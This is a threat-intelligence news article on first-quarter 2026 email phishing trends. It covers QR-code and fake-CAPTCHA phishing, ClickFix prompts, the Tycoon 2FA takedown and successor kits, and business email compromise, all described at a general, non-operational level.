admin Fresh threat telemetry for the first quarter of 2026 shows email-based phishing remains vast in scale, with about 8.3 billion threats detected between January and March. Although monthly volumes eased from 2.9 billion in January to 2.6 billion in March, the composition of attacks changed sharply. Link-based threats accounted for 78% of email attacks, underlining a move away from traditional malware attachments towards hosted phishing pages designed to harvest logins, session cookies and authentication tokens.
The fastest-growing technique involved QR codes, which rose from 7.6 million attacks in January to 18.7 million in March, a 146% increase over the quarter. Attackers embedded malicious QR codes inside PDFs, office documents and email bodies to push victims towards phishing sites, often on personal mobile devices that sit outside corporate monitoring systems. PDF attachments remained the dominant delivery channel for QR-based campaigns, rising to about 70% of such attacks by March, while QR codes placed directly inside email messages surged by 336% during the month.
Fake CAPTCHA gates have become a parallel growth area. CAPTCHA-gated phishing more than doubled in March to 11.9 million attacks, the highest monthly level recorded over the past year. These pages exploit a familiar user habit: completing a visual verification step before reaching content. Behind the apparent security check, victims are redirected to counterfeit login pages or manipulated into carrying out harmful actions.
ClickFix tactics extend that deception further. Instead of merely asking users to click a link, attackers display fake verification instructions that tell victims to copy and run commands on their own systems. The technique has been used to trigger PowerShell execution, download information-stealing malware, or redirect users into credential-harvesting flows. Its success depends less on exploiting software flaws than on persuading users that they are completing a routine browser or access check.
The rise of these methods comes despite disruption against major phishing-as-a-service platforms. Tycoon 2FA, one of the most prominent kits used to bypass multifactor authentication, suffered a coordinated takedown in March that targeted 330 domains linked to phishing portals, control panels and related infrastructure. The operation reduced Tycoon-linked email activity by about 15% over the rest of the month and limited access to active phishing pages.
Yet the broader ecosystem has proved resilient. Tycoon 2FA first appeared in 2023 and became a leading adversary-in-the-middle platform, enabling attackers to impersonate services such as Microsoft 365, Outlook, OneDrive, SharePoint, Gmail and other cloud applications. By relaying authentication sessions in real time, the kit could capture credentials and session cookies, allowing attackers to access accounts even when victims used non-phishing-resistant multifactor authentication.
By mid-2025, Tycoon 2FA was linked to about 62% of blocked phishing attempts in some enterprise telemetry and generated more than 30 million malicious emails in a single month. It is estimated to have affected around 96,000 victims worldwide, including more than 55,000 Microsoft customers. Healthcare, education and public-sector organisations were among the most exposed because compromised accounts in those environments can open access to sensitive records, payment systems, procurement channels and internal collaboration tools.
The takedown has not removed the threat model. Attack code, templates, hosting patterns and customer bases have migrated across competing kits and affiliate networks. Other platforms, including Mamba 2FA, EvilProxy, Sneaky 2FA and Whisper 2FA, have attempted to absorb demand left by Tycoon’s disruption. This has fragmented the market rather than ending it, making detection based on a single brand or infrastructure pattern less reliable.
Credential phishing now functions as an industrial service economy. Attackers can rent phishing kits, buy hosting, use bulk email tools, purchase stolen credentials, and monetise access through business email compromise, invoice fraud, data theft or ransomware deployment. CAPTCHA gates, QR codes and ClickFix prompts fit neatly into this model because they increase user interaction while reducing the effectiveness of automated scanning.
Business email compromise remains a major downstream risk. About 10.7 million such attacks were recorded in the first quarter, many involving generic outreach, fake invoices, payment redirection and impersonation of trusted staff or suppliers. Once a valid account is compromised, attackers can exploit existing conversations, internal contact lists and legitimate cloud sessions, making fraud attempts harder to distinguish from normal business activity.
